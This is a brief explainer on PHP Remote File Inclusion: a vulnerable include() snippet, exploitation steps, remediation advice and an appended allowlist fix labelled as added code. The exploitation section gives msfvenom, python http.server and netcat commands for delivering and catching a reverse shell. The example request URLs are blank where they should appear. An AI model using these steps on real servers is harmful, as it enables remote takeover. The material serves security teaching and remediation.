tl;dr: Remote File Inclusion
What is it?
A web app takes user-controlled input (e.g. a URL query string parameter) and passes it to an include command without sanitising it. The server then fetches and executes the remote file, which could be a reverse shell script or other malicious code.
May I see it?
$incfile = $_REQUEST["file"]; // user-controlled value, never sanitised
include($incfile);            // remote URL is fetched and executed here
The file parameter is taken from the query string and passed straight into an include command. If the following request is made:
the server will resolve it to:
and will run any code within the attacker’s script.
How can I exploit it?
So, the attacker could generate a PHP reverse shell payload like so:
msfvenom -p php/meterpreter_reverse_tcp LHOST=<IP> LPORT=<PORT> -f raw > shell.php
host the payload over HTTP:
python -m http.server 443
set up a netcat listener:
nc -lvnp <port>
and make the HTTP request above. If the server is vulnerable, it will connect to the attacker's IP, download the shell and run it; netcat will then catch the reverse shell.
How do I remediate it?
Create an allowlist of known, safe values for file inclusion and accept only those. You could map simple numerical inputs like
faq.txt and then reject all other values.
Create a denylist of known disallowed values.
Employ a specific naming scheme and check all provided values against it. Guard against double extensions such as
If feasible, use a jail or sandboxing strategy such as chroot() to limit the locations that the process can access.
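The allowlist remediation above, as an added example that is not code from the original post: a small integer id is mapped to a known file name, everything else is rejected before it can reach include(), and the resolved path is additionally checked to stay inside a base directory. The function name resolveIncludePath, the pages directory and the entries other than faq.txt are assumptions made for this example.

```php
<?php
// Added example (not from the original post): allowlist-based fix for the
// vulnerable include() shown earlier. Assumes includable pages live under
// $baseDir and that the client only ever sends a small integer id.
// Keep allow_url_include=Off in php.ini (the default) as defence in depth,
// so include() cannot fetch http:// URLs at all even if a check is bypassed.

declare(strict_types=1);

const PAGE_ALLOWLIST = [
    1 => 'faq.txt',      // page-specified example value
    2 => 'about.txt',    // constructed for this example
    3 => 'contact.txt',  // constructed for this example
];

/**
 * Resolve a user-supplied value to a local file path, or return null to reject.
 * Only keys of PAGE_ALLOWLIST are accepted, so URLs, traversal strings,
 * php:// wrappers and double extensions never reach include().
 */
function resolveIncludePath(string $userValue, string $baseDir): ?string
{
    // Accept only a plain positive integer; "1 ", "1.php" or "01" all fail.
    if (!preg_match('/^[1-9][0-9]{0,3}$/', $userValue)) {
        return null;
    }
    $id = (int) $userValue;
    if (!array_key_exists($id, PAGE_ALLOWLIST)) {
        return null;
    }

    // Defence in depth: the canonical path must still sit inside $baseDir.
    // realpath() returns false for a missing file, which is also rejected.
    $base = realpath($baseDir);
    $path = realpath($baseDir . DIRECTORY_SEPARATOR . PAGE_ALLOWLIST[$id]);
    if ($base === false || $path === false
        || strpos($path, $base . DIRECTORY_SEPARATOR) !== 0) {
        return null;
    }
    return $path;
}

$page = resolveIncludePath((string) ($_GET['file'] ?? ''), __DIR__ . '/pages');
if ($page === null) {
    http_response_code(400);
    exit('Unknown page');
}
include $page;
```

A request such as ?file=1 now includes pages/faq.txt, while ?file=http://... or ?file=../../etc/passwd is rejected with a 400 before any file system or network access occurs.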